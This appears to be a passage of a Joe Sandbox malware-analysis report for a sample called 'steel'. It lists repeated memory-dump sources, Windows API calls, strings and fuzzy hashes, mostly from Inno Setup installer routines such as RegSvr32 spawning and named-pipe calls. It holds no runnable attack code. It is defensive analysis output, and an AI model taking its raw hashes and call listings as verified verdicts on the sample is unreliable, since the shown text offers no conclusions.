                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                            • API String ID: 2610873146-3407710046
                                                                                            • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                            • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                            • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                            • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,02123858,00000000), ref: 00458C79
                                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                                            • API String ID: 2182916169-3012584893
                                                                                            • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                            • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                            • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                            • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                            • API String ID: 1914119943-2711329623
                                                                                            • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                            • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                            • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                            • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                            APIs
                                                                                            • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                            • SaveDC.GDI32(?), ref: 00416E27
                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                            • DeleteObject.GDI32(?), ref: 00416F22
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                            • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                            • String ID:
                                                                                            • API String ID: 375863564-0
                                                                                            • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                            • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                            • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                            • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                                            • String ID:
                                                                                            • API String ID: 3985193851-0
                                                                                            • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                            • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                            • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                            • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                            • SendNotifyMessageA.USER32(0002043C,00000496,00002710,00000000), ref: 00481A97
                                                                                            Strings
                                                                                            • DeinitializeSetup, xrefs: 0048190D
                                                                                            • Restarting Windows., xrefs: 00481A72
                                                                                            • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                            • Deinitializing Setup., xrefs: 00481872
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary$MessageNotifySend
                                                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                            • API String ID: 3817813901-1884538726
                                                                                            • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                            • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                            • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                            • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                            APIs
                                                                                            • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                            • GetActiveWindow.USER32 ref: 0046172B
                                                                                            • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                            • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                            • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                            • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                            • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                            • String ID: A
                                                                                            • API String ID: 2684663990-3554254475
                                                                                            • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                            • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                            • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                            • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                              • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                            • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                            • API String ID: 884541143-1710247218
                                                                                            • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                            • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                            • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                            • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                            • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                            • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                            • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                            • API String ID: 190572456-3516654456
                                                                                            • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                            • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                            • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                            • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                            APIs
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                            • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                            • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                            • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$StretchText
                                                                                            • String ID:
                                                                                            • API String ID: 2984075790-0
                                                                                            • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                            • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                            • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                            • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                            APIs
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDirectoryHandleSystem
                                                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                            • API String ID: 2051275411-1862435767
                                                                                            • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                            • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                            • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                            • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                            APIs
                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                            • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                            • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$Color$Draw$OffsetRect
                                                                                            • String ID:
                                                                                            • API String ID: 1005981011-0
                                                                                            • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                            • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                            • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                            • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041B745
                                                                                            • GetDC.USER32(?), ref: 0041B751
                                                                                            • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
